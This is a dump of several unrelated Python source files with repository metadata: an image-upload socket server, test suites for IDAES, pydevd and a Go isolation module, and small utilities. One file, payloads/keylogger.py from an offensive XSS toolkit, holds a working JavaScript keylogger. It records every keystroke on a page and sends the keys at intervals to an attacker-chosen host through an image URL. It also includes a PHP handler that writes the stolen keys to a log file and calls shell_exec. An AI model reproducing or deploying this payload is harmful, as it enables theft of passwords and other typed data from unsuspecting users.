client_sock.send(best_image_dir[7:].encode()) # Sending the best image dir to the client
self.sem.release() # Releasing the client after he has gotten his result.
def receiving_loop(self, client_sock): # Not used, using the encrypted version
"""This is one of the most important functions in the server! It receives the client socket and reads
from it until it reaches the \r\n\r\n (marking the client is sending image data now. This function returns
the filesize, filename and might contain the beginning of the image data!"""
part = b""
final_parts = []
start_of_image = b""
while True:
received = self.decryptor.decrypt(client_sock.recv(1024))
# received = client_sock.recv(1024)
if b"\r\n\r\n" in received: # Checking if we have reached the image data
parts = received.split(b"\r\n\r\n") # Getting the part before the image metadata(size,name) and after.
print("Reached image metadata!")
final_parts.append(part + parts[0]) # Parts[0] should contain a piece of a part
start_of_image += parts[1] # Probably going to contain the start of the image data
break
else:
part += received # Just adding the total message since haven't reached image data
parts_again = final_parts[0].split(b"\r\n")
filesize = parts_again[0].decode() # Getting string instead of bytes
filename = parts_again[1].decode() # Getting string instead of bytes
return filesize, filename, start_of_image
def encrypted_receiving_loop(self, client_sock, size_left, metadata_start):
"""This is one of the most important functions in the server! It receives the client socket, the amount of bytes
left to read from the buffer until the end of the message, and the metadata start if there is one. The function
returns the image name and the image data."""
metadata_total = metadata_start # Starting the total with the start of the metadata
how_many_bytes = 2048 # The amount of bytes that we are going to receive
while size_left > 0: # Running in a loop while we did not receive the whole size.
if size_left < how_many_bytes: # This will happen on the last recv needed
how_many_bytes = size_left
data = client_sock.recv(how_many_bytes) # Reading from the buffer
size_left -= len(data) # Decreasing the bytes left to read from the buffer.
metadata_total += data
decrypted_metadata = self.decryptor.decrypt(metadata_total) # Decrypting the metadata.
parts_of_metadata = decrypted_metadata.split(b"\r\n\r\n") # Getting the name and image_parts
image_name = parts_of_metadata[0].decode() # Need the string of the image_name
image_data = parts_of_metadata[1] # Need to leave the image_data as bytes
return image_name, image_data
def get_images_from_user(self, client_sock, thread_num):
"""This function gets the client socket and the thread number. This function receives all of the client's
image files, this includes the filesizes the filenames and the actual images. This function then goes on
and calls predict_on_images_and_send_result."""
print('You are thread number: ' + str(thread_num))
self.sem.acquire() # Decreases the users logged in at the time (new thread opened)
number_of_files = int(client_sock.recv(1024).decode())
print(f"The number of files that the user is going to send is: {number_of_files}")
subfolder_name = "thread" + str(thread_num)
if not os.path.isdir(self.server_file_extract_dir + str(thread_num)):
os.mkdir(subfolder_name) # Create the subfolder
for i in range(number_of_files):
# receive the file infos
print("Receiving file number " + str(i+1))
initial_receiver = client_sock.recv(8192) # Fist initial
print(initial_receiver)
parts = initial_receiver.split(b"\r\n", 1) # Only splitting it once. Want the size of the metadata
metadata_size = int(parts[0].decode()) # Getting the int size of the metadata
metadata_start = parts[1] # Might have some of the metadata in the initial_receiver
total_size_left_to_recv = metadata_size - len(metadata_start) # How many more bytes left for recv.
filename, image_bytes = self.encrypted_receiving_loop(client_sock, total_size_left_to_recv, metadata_start)
# Getting the filename and the image_bytes data
filename = os.path.basename(filename) # Getting the basename of the file (for example image1.jpg)
print(f"os path basename is: {filename}")
file_dir_with_file = self.server_file_extract_dir + str(thread_num) + "/server_" + filename
# Building the full path name
print(f"Started saving picture number {i+1}, the name of it is: {filename}")
with open(file_dir_with_file, "wb") as f: # Going to be writing bytes to the file.
f.write(image_bytes) # Inserting the bytes into the image and creating it.
print(f"Finished download for file number {i+1}, the name of it is: {filename}")
self.predict_on_images_and_send_result(client_sock, self.server_file_extract_dir + str(thread_num))
def start(self):
"""This is the server start function that is called in the beginning. This function accepts new clients
and starts the thread for them with the appropriate thread number."""
try:
print(f"Server starting up on {self.IP} port {self.PORT}")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Initializing the socket.
sock.bind((self.IP, self.PORT))
sock.listen(1) # Getting one client at a time.
thread_number = 0 # This will be sort of an ID for the thread, used in debugging
while True: # Keep accepting as many people that want to help (speed up the process)
thread_number += 1 # Increasing because of new client
print('\r\nWaiting for a new client')
client_socket, client_address = sock.accept()
print('New client entered!')
client_socket.sendall('Hello and welcome to Statispic\'s server. '
'We hope we can help you achieve your goals on becoming an'
'instagram star!\r\nCreated by: Tomer Cahal'.encode()) # Message to the user
thread = threading.Thread(target=self.get_images_from_user, args=(client_socket, thread_number))
thread.start() # Starting the thread
except socket.error as e:
print(e)
if __name__ == '__main__':
s = Server()
s.start()
#
# with zipfile.ZipFile(self.local_file_name, 'r') as zip_file:
# print("Extracting files...")
# print(zip_file.namelist())
# for member in zip_file.namelist():
# print(member)
# filename = os.path.basename(member) # Extracting the file name itself from the name
# print(filename)
# if not filename: # Skip directories
# continue
# # copy file (taken from zipfiles' extract)
# source = member # zip_file.open(member)
# #target = os.path.join(self.server_file_extract_dir, filename)
# target = self.server_file_extract_dir + "/" + filename
# print(source, target)
# with source, target:
# shutil.copyfile(source, target)
# print("Done extracting...") | 56.990385 | 131 | 0.655812 |
09cbf5fdbf02b965508fb3950fafce1223ab2c4c | 1,035 | py | Python | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 18 | 2022-02-20T13:27:36.000Z | 2022-03-23T21:35:13.000Z | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 1 | 2022-02-20T13:37:20.000Z | 2022-02-21T14:38:26.000Z | payloads/keylogger.py | redcode-labs/poXSSon | 7046fac15e54e05a73d7d46a00916161d9f36cca | [
"ISC"
] | 2 | 2022-02-20T13:35:56.000Z | 2022-02-21T11:59:15.000Z | #!/usr/bin/python3.7
import socket
import http.server
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="keylogger"
description="Captures keystrokes and sends them to an external host"
options = [["LHOST", "Host to send captured strokes to", local_ip()],
["INTERVAL", "Number of seconds after which captured keystrokes are sent", "1"]]
handler_options = [["LOGFILE", "File to write keystrokes to", "keystrokes.txt"]]
payload = """
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://LHOST:8000/handler.php?c='+keys;
keys = '';
}, INTERVAL*1000);
"""
handler = """
<?php
shell_exec("ls");
if(!empty($_GET['c'])) {
$f=fopen("LOGFILE","a+");
fwrite($f,$_GET['c']);
fclose($f);
}
?>
"""
| 24.642857 | 91 | 0.629952 |
ce3db34940e8819e06eab7d5bfd8e330bee3b0bb | 951 | py | Python | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | pjquirk/azure-sdk-for-python | cbf02ec4f177b96eae1dbbba87c34c2c93880150 | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | pjquirk/azure-sdk-for-python | cbf02ec4f177b96eae1dbbba87c34c2c93880150 | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py | xiafu-msft/azure-sdk-for-python | 4d9560cfd519ee60667f3cc2f5295a58c18625db | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import pytest
import time
from azure import eventhub
from azure.eventhub import EventData, EventHubClient, Offset
@pytest.mark.liveTest
def test_iothub_receive_sync(iot_connection_str, device_id):
client = EventHubClient.from_iothub_connection_string(iot_connection_str, debug=True)
receiver = client.add_receiver("$default", "0", operation='/messages/events')
try:
client.run()
partitions = client.get_eventhub_info()
assert partitions["partition_ids"] == ["0", "1", "2", "3"]
received = receiver.receive(timeout=5)
assert len(received) == 0
finally:
client.stop() | 36.576923 | 89 | 0.60673 |
1cc59c67e70b29404f44c635eaea09da7ec4e893 | 783 | py | Python | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 10 | 2018-11-14T10:58:41.000Z | 2021-12-11T01:43:51.000Z | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 1 | 2021-02-07T06:35:24.000Z | 2021-02-07T06:35:24.000Z | test/test_go_isolation_rootfs.py | afxcn/unit | a336928e1027af92d0c9bb2ccb369a3f9b53abae | [
"Apache-2.0"
] | 3 | 2018-10-31T12:10:05.000Z | 2019-02-14T14:09:48.000Z | import os
import pytest
from unit.applications.lang.go import TestApplicationGo
class TestGoIsolationRootfs(TestApplicationGo):
prerequisites = {'modules': {'go': 'all'}}
def test_go_isolation_rootfs_chroot(self, is_su, temp_dir):
if not is_su:
pytest.skip('requires root')
if os.uname().sysname == 'Darwin':
pytest.skip('chroot tests not supported on OSX')
isolation = {
'rootfs': temp_dir,
}
self.load('ns_inspect', isolation=isolation)
obj = self.getjson(url='/?file=/go/app')['body']
assert obj['FileExists'] == True, 'app relative to rootfs'
obj = self.getjson(url='/?file=/bin/sh')['body']
assert obj['FileExists'] == False, 'file should not exists'
| 26.1 | 67 | 0.618135 |
123ac6e522accb44d3043d8dea5ff72b38429410 | 5,700 | py | Python | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | null | null | null | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | 4 | 2017-12-07T05:43:03.000Z | 2017-12-14T02:41:03.000Z | sw_excel_parser/engines.py | telminov/sw-excel-parser | 5a9aa8eb8b6c3af2083612114e42e38598ce7e7b | [
"MIT"
] | null | null | null | from collections import OrderedDict
from itertools import chain
from typing import List, Dict, Optional, Set
import xlrd
from xlrd.sheet import Sheet
class BaseEngine:
item = None
def __init__(self, workbook: xlrd.Book = None, file_contents: bytes = None, *args, **kwargs):
self.workbook = None
self.set_workbook(workbook, file_contents)
self.sheet_items = OrderedDict()
def __iter__(self):
return iter(self.sheet_items.items())
def keys(self):
return self.sheet_items.keys()
def items(self):
return self.sheet_items.items()
def values(self):
return self.sheet_items.values()
def set_workbook(self, workbook: xlrd.Book = None, file_contents: bytes = None):
if file_contents:
self.workbook = xlrd.open_workbook(file_contents=file_contents)
elif workbook:
self.workbook = workbook
def get_sheets(self) -> List[Sheet]:
if not self.workbook:
raise ValueError('You must provide workbook or file_contents')
return self.workbook.sheets()
def find_headers(self) -> Dict[Sheet, Optional[int]]:
sheets = self.get_sheets()
fields = self.item._unbound_fields.values()
header = {field.kwargs['header'].lower() for field in fields}
result = OrderedDict()
for sheet in sheets:
sheet_data = (sheet.row_values(nrow) for nrow in range(sheet.nrows))
for nrow, row_values in enumerate(sheet_data):
row_values = {str(field).lower().strip() for field in row_values}
if row_values >= header:
result[sheet] = nrow
break
else:
self.lost_header_handler(header=header, row_values=row_values)
return result
def lost_header_handler(self, header, row_values) -> None:
pass
def get_header(self, sheet) -> Optional[List[str]]:
header = None
header_map = self.find_headers()
if sheet in header_map:
header_nrow = header_map[sheet]
header = sheet.row_values(header_nrow)
return header
def prepare_items(self) -> None:
header_map = self.find_headers()
for sheet, header_nrow in header_map.items():
data_offset = header_nrow + 1
sheet_header = list(title.lower().strip() for title in self.get_header(sheet))
sheet_data = list(sheet.row_values(nrow) for nrow in range(data_offset, sheet.nrows))
if sheet_data:
self.sheet_items[sheet] = []
for nrow, row_data in enumerate(sheet_data, start=data_offset):
item = self.item(nrow, dict(zip(sheet_header, row_data)))
self.sheet_items[sheet].append(item)
def parse(self) -> None:
self.sheet_items.clear()
self.prepare_items()
def is_recognized(self) -> bool:
headers_nrows = self.find_headers().values()
return any(nrow is not None for nrow in headers_nrows)
def get_cleaned_data(self):
cleaned_data = OrderedDict()
for sheet, items in self.items():
sheet_data = []
for item in items:
if item.cleaned_data:
sheet_data.append(item.cleaned_data)
cleaned_data[sheet.name] = sheet_data
return cleaned_data
class StatsMixin:
def __init__(self, *args, **kwargs):
super(StatsMixin, self).__init__(*args, **kwargs)
self.stats = {}
def parse(self) -> None:
self.stats.clear()
super().parse()
self.compute_stats()
def compute_stats(self) -> None:
items = list(chain.from_iterable(self.sheet_items.values()))
success_count = len([item for item in items if item.is_valid()])
errors_count = len(items) - success_count
erroneous_sheets = [sheet.name for sheet, items in self if any(not item.is_valid() for item in items)]
self.stats = dict(
total_count=len(items),
success_count=success_count,
errors_count=errors_count,
erroneous_sheets=erroneous_sheets
)
class ErrorsMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lost_headers = set()
self.errors = {}
def parse(self) -> None:
self.lost_headers.clear()
self.errors.clear()
super().parse()
self.collect_errors()
def lost_header_handler(self, header: Set[str], row_values: Set[str]) -> None:
if header & row_values:
self.lost_headers.update(header - row_values)
def collect_errors(self) -> None:
items = list(chain.from_iterable(self.values()))
erroneous_items = [item for item in items if not item.is_valid()]
self.errors = dict(
non_field_errors=dict(
lost_headers=self.lost_headers
)
)
for item in erroneous_items:
for name, field in item.fields.items():
if name in item.errors:
if name not in self.errors:
self.errors[name] = dict(
label=field.header,
rows=[]
)
self.errors[name]['rows'].append(
dict(
nrow=item.nrow,
value=field.extract_data(item.data),
error=str(item.errors[name])
)
)
class Engine(ErrorsMixin, StatsMixin, BaseEngine):
pass
| 31.491713 | 110 | 0.583509 |
68b5f96342b7d0fa1f982c3962326401240505ee | 7,477 | py | Python | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | null | null | null | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | null | null | null | idaes/core/util/tests/test_model_diagnostics.py | CATER-UCF/idaes-pse | afccbd43e56dc39d63542b4d400ac027b0ccbe84 | [
"RSA-MD"
] | 1 | 2022-03-17T11:08:43.000Z | 2022-03-17T11:08:43.000Z | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This module contains model diagnostic utility functions for use in IDAES (Pyomo) models.
"""
import pytest
# Need to update
import pyomo.environ as pyo
# TODO: Add pyomo.dae test case
"""
from pyomo.environ import TransformationFactory
from pyomo.dae import ContinuousSet, DerivativeVar
"""
# Need to update
from idaes.core.util.model_diagnostics import *
# Author: Alex Dowling
# This was from
# @pytest.fixture()
def problem1():
m = pyo.ConcreteModel()
m.I = pyo.Set(initialize=[i for i in range(5)])
m.x = pyo.Var(m.I, bounds=(-10, 10), initialize=1.0)
m.con1 = pyo.Constraint(expr=m.x[0] + m.x[1] - m.x[3] >= 10)
m.con2 = pyo.Constraint(expr=m.x[0] * m.x[3] + m.x[1] >= 0)
m.con3 = pyo.Constraint(expr=m.x[4] * m.x[3] + m.x[0] * m.x[3] - m.x[4] == 0)
m.obj = pyo.Objective(expr=sum(m.x[i] ** 2 for i in m.I))
return m
def example2(with_degenerate_constraint=True):
"""Create the Pyomo model for Example 2
Arguments:
with_degenerate_constraint: Boolean, if True, include the redundant linear constraint
Returns:
m2: Pyomo model
"""
m2 = pyo.ConcreteModel()
m2.I = pyo.Set(initialize=[i for i in range(1, 4)])
m2.x = pyo.Var(m2.I, bounds=(0, 5), initialize=1.0)
m2.con1 = pyo.Constraint(expr=m2.x[1] + m2.x[2] >= 1)
m2.con2 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1)
m2.con3 = pyo.Constraint(expr=m2.x[2] - 2 * m2.x[3] <= 1)
m2.con4 = pyo.Constraint(expr=m2.x[1] + m2.x[3] >= 1)
if with_degenerate_constraint:
m2.con5 = pyo.Constraint(expr=m2.x[1] + m2.x[2] + m2.x[3] == 1)
m2.obj = pyo.Objective(expr=sum(m2.x[i] for i in m2.I))
return m2
def extract_constraint_names(cs):
"""Get constraint names from ComponentSet
Arguments:
cs: ComponentSet object
Return:
constraint_names: list of constraint names (strings)
"""
constraint_names = []
for i in cs:
constraint_names.append(i.name)
return constraint_names
# Problem 1
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem1():
# Create test problem
m = problem1()
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m, tee=True)
# Create Degeneracy Hunter object
dh = DegeneracyHunter(m)
# Find constraints with residuals > 0.1
initial_point_constraints = dh.check_residuals(tol=0.1)
# Check there are 2 constraints with large residuals
assert len(initial_point_constraints) == 2
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con1"
# Check second constraint
assert initial_point_constraint_names[1] == "con3"
opt.options["max_iter"] = 50
# Solve
opt.solve(m, tee=True)
# Find constraints with residuals > 0.1
solution_constraints = dh.check_residuals(tol=1e-6)
# Check at the solution no constraints are violated
assert len(solution_constraints) == 0
# Check no constraints are near their bounds
solution_bounds = dh.check_variable_bounds(tol=0.1)
# Check at the solution no constraints are violated
assert len(solution_bounds) == 0
# Problem 2 without degenerate constraint
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem2_without_degenerate_constraint():
# Create test problem instance
m2 = example2(with_degenerate_constraint=False)
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m2, tee=True)
# Create Degeneracy Hunter object
dh2 = DegeneracyHunter(m2)
# Check for violated constraints at the initial point
initial_point_constraints = dh2.check_residuals(tol=0.1)
# Check there are 1 constraints with large residuals
assert len(initial_point_constraints) == 1
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con2"
# Resolve
opt.options["max_iter"] = 500
opt.solve(m2, tee=True)
# Check solution
x_sln = []
for i in m2.I:
x_sln.append(m2.x[i]())
assert pytest.approx(x_sln[0], abs=1e-6) == 1.0
assert pytest.approx(x_sln[1], abs=1e-6) == 0.0
assert pytest.approx(x_sln[2], abs=1e-6) == 0.0
# Problem 2 with degenerate constraint
@pytest.mark.skipif(not pyo.SolverFactory("ipopt").available(False), reason="no Ipopt")
@pytest.mark.unit
def test_problem2_with_degenerate_constraint():
# Create test problem instance
m2 = example2(with_degenerate_constraint=True)
# Specify Ipopt as the solver
opt = pyo.SolverFactory("ipopt")
# Specifying an iteration limit of 0 allows us to inspect the initial point
opt.options["max_iter"] = 0
# "Solving" the model with an iteration limit of 0 load the initial point and applies
# any preprocessors (e.g., enforces bounds)
opt.solve(m2, tee=True)
# Create Degeneracy Hunter object
dh2 = DegeneracyHunter(m2)
# Check for violated constraints at the initial point
initial_point_constraints = dh2.check_residuals(tol=0.1)
# Check there are 2 constraints with large residuals
assert len(initial_point_constraints) == 2
initial_point_constraint_names = extract_constraint_names(initial_point_constraints)
# Check first constraint
assert initial_point_constraint_names[0] == "con2"
# Check first constraint
assert initial_point_constraint_names[1] == "con5"
# Resolve
opt.options["max_iter"] = 500
opt.solve(m2, tee=True)
# Check solution
x_sln = []
for i in m2.I:
x_sln.append(m2.x[i]())
assert pytest.approx(x_sln[0], abs=1e-6) == 1.0
assert pytest.approx(x_sln[1], abs=1e-6) == 0.0
assert pytest.approx(x_sln[2], abs=1e-6) == 0.0
# Check the rank
n_rank_deficient = dh2.check_rank_equality_constraints()
assert n_rank_deficient == 1
# TODO: Add MILP solver to idaes get-extensions and add more tests
| 29.788845 | 93 | 0.679684 |
08eab65ea5450a3d895d4fbb35b0897fce239850 | 1,323 | py | Python | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 23 | 2020-11-19T19:33:34.000Z | 2022-03-02T15:43:08.000Z | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 1 | 2021-04-03T18:02:50.000Z | 2021-04-03T18:02:50.000Z | apps/dashboard/utilities.py | SteinOveHelset/minutos | 73cdcb44409f97b05680c6a048f80eb4bd3f1f46 | [
"MIT"
] | 2 | 2021-01-23T02:06:59.000Z | 2021-09-09T04:58:09.000Z | # Import Python
from datetime import datetime
# Models
from apps.project.models import Entry
# Utility functions
def get_time_for_user_and_date(team, user, date):
entries = Entry.objects.filter(team=team, created_by=user, created_at__date=date, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_team_and_month(team, month):
entries = Entry.objects.filter(team=team, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_month(team, user, month):
entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_project_and_month(team, project, user, month):
entries = Entry.objects.filter(team=team, project=project, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries)
def get_time_for_user_and_team_month(team, user, month):
entries = Entry.objects.filter(team=team, created_by=user, created_at__year=month.year, created_at__month=month.month, is_tracked=True)
return sum(entry.minutes for entry in entries) | 38.911765 | 156 | 0.792139 |
28ac3ec6248e281db810942a1c6e3e508f25da22 | 6,040 | py | Python | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
] | null | null | null | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
] | null | null | null | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
] | null | null | null | from sqlalchemy.exc import InvalidRequestError
from sqlalchemy.inspection import inspect
from sqlalchemy.orm.mapper import Mapper
from sqlalchemy.util import symbol
import types
from .exceptions import BadQuery, FieldNotFound, BadSpec
class Field(object):
def __init__(self, model, field_name):
self.model = model
self.field_name = field_name
def get_sqlalchemy_field(self):
sqlalchemy_field = get_nested_column(self.model, self.field_name)
if sqlalchemy_field is None:
raise FieldNotFound(
'Model {} has no column `{}`.'.format(
self.model, self.field_name
)
)
# If it's a hybrid method, then we call it so that we can work with
# the result of the execution and not with the method object itself
if isinstance(sqlalchemy_field, types.MethodType):
sqlalchemy_field = sqlalchemy_field()
return sqlalchemy_field
def _is_hybrid_property(orm_descriptor):
return orm_descriptor.extension_type == symbol('HYBRID_PROPERTY')
def _is_hybrid_method(orm_descriptor):
return orm_descriptor.extension_type == symbol('HYBRID_METHOD')
def get_relationship_models(model, field):
parts = field.split(".")
if len(parts) > 1:
# Order in which joins are applied to the query matters so use list.
relationships = list()
# Find all relationships.
for i in range(1, len(parts)):
if (column := find_nested_relationship_model(inspect(model), parts[0:i])) is not None:
relationships.append(column.class_attribute)
return relationships
return list()
def find_nested_relationship_model(mapper, field):
parts = field if isinstance(field, list) else field.split(".")
if (part := parts[0]) in mapper.relationships:
related_field = mapper.relationships[part]
return find_nested_relationship_model(related_field.mapper, ".".join(parts[1::])) if len(parts) > 1 else related_field
else:
return None
def get_nested_column(model, field):
"""
Searches through relationships to find the requested field.
"""
parts = field if isinstance(field, list) else field.split(".")
mapper = inspect(model)
orm_descriptors = mapper.all_orm_descriptors
hybrid_fields = [
key for key, item in orm_descriptors.items()
if _is_hybrid_property(item) or _is_hybrid_method(item)
]
# Search in own model fields
if len(parts) == 1:
if field in mapper.columns or field in mapper.composites or field in hybrid_fields:
return getattr(model, field)
else:
return None
# Search in relationships.
if (part := parts[0]) in mapper.relationships:
return get_nested_column(getattr(model, part).property.entity.class_, ".".join(parts[1::]))
else:
return None
def get_query_models(query):
"""Get models from query.
:param query:
A :class:`sqlalchemy.orm.Query` instance.
:returns:
A dictionary with all the models included in the query.
"""
models = [col_desc['entity'] for col_desc in query.column_descriptions]
models.extend(mapper.class_ for mapper in query._join_entities)
# account also query.select_from entities
if (
hasattr(query, '_select_from_entity') and
(query._select_from_entity is not None)
):
model_class = (
query._select_from_entity.class_
if isinstance(query._select_from_entity, Mapper) # sqlalchemy>=1.1
else query._select_from_entity # sqlalchemy==1.0
)
if model_class not in models:
models.append(model_class)
return {model.__name__: model for model in models}
def get_model_from_spec(spec, query, default_model=None):
""" Determine the model to which a spec applies on a given query.
A spec that does not specify a model may be applied to a query that
contains a single model. Otherwise the spec must specify the model to
which it applies, and that model must be present in the query.
:param query:
A :class:`sqlalchemy.orm.Query` instance.
:param spec:
A dictionary that may or may not contain a model name to resolve
against the query.
:returns:
A model instance.
:raise BadSpec:
If the spec is ambiguous or refers to a model not in the query.
:raise BadQuery:
If the query contains no models.
"""
models = get_query_models(query)
if not models:
raise BadQuery('The query does not contain any models.')
model_name = spec.get('model')
if model_name is not None:
models = [v for (k, v) in models.items() if k == model_name]
if not models:
raise BadSpec(
'The query does not contain model `{}`.'.format(model_name)
)
model = models[0]
else:
if len(models) == 1:
model = list(models.values())[0]
elif default_model is not None:
return default_model
else:
raise BadSpec("Ambiguous spec. Please specify a model.")
return model
def get_default_model(query):
""" Return the singular model from `query`, or `None` if `query` contains
multiple models.
"""
query_models = get_query_models(query).values()
if len(query_models) == 1:
default_model, = iter(query_models)
else:
default_model = None
return default_model
def auto_join(query, *relationships, is_left_outer_join=False):
""" Automatically join models to `query` if they're not already present.
"""
for relationship in relationships:
model = relationship.property.entity.class_
if model not in get_query_models(query).values():
try:
query = query.join(relationship, isouter=is_left_outer_join)
except InvalidRequestError:
pass # can't be autojoined
return query
| 31.134021 | 126 | 0.654801 |
e4f53bc6043aab5ef105ada19f5047b056755ade | 1,805 | py | Python | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | alexey-anufriev/intellij-community | ffcd46f14e630acdefcc76e2bfc7c43d2449013a | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | alexey-anufriev/intellij-community | ffcd46f14e630acdefcc76e2bfc7c43d2449013a | [
"Apache-2.0"
] | 1 | 2020-07-30T19:04:47.000Z | 2020-07-30T19:04:47.000Z | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | bradleesand/intellij-community | 750ff9c10333c9c1278c00dbe8d88c877b1b9749 | [
"Apache-2.0"
] | 1 | 2020-10-15T05:56:42.000Z | 2020-10-15T05:56:42.000Z | from _pydevd_bundle.pydevd_io import IORedirector
from _pydevd_bundle.pydevd_comm import NetCommandFactory
import pytest
def test_io_redirector():
class MyRedirection1(object):
encoding = 'foo'
class MyRedirection2(object):
pass
my_redirector = IORedirector(MyRedirection1(), MyRedirection2(), wrap_buffer=True)
none_redirector = IORedirector(None, None, wrap_buffer=True)
assert my_redirector.encoding == 'foo'
with pytest.raises(AttributeError):
none_redirector.encoding
# Check that we don't fail creating the IORedirector if the original
# doesn't have a 'buffer'.
for redirector in (
my_redirector,
none_redirector,
):
redirector.write('test')
redirector.flush()
assert not redirector.isatty()
class _DummyWriter(object):
__slots__ = ['commands', 'command_meanings']
def __init__(self):
self.commands = []
self.command_meanings = []
def add_command(self, cmd):
from _pydevd_bundle.pydevd_comm import ID_TO_MEANING
meaning = ID_TO_MEANING[str(cmd.id)]
self.command_meanings.append(meaning)
self.commands.append(cmd)
class _DummyPyDb(object):
def __init__(self):
self.cmd_factory = NetCommandFactory()
self.writer = _DummyWriter()
def test_debug_console():
from _pydev_bundle.pydev_console_utils import DebugConsoleStdIn
class OriginalStdin(object):
def readline(self):
return 'read'
original_stdin = OriginalStdin()
py_db = _DummyPyDb()
debug_console_std_in = DebugConsoleStdIn(py_db, original_stdin)
assert debug_console_std_in.readline() == 'read'
assert py_db.writer.command_meanings == ['CMD_INPUT_REQUESTED', 'CMD_INPUT_REQUESTED']
| 25.422535 | 90 | 0.692521 |
3f0815ae203c73e2c6ae98751aeac2234ba74563 | 80 | py | Python | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | null | null | null | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | 1 | 2018-05-11T02:46:09.000Z | 2018-05-11T02:46:09.000Z | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | 1 | 2018-04-17T16:08:34.000Z | 2018-04-17T16:08:34.000Z | from .base import CisCaller, CisCallerCommand
from .cimpl import CimplCisCaller
| 26.666667 | 45 | 0.85 |
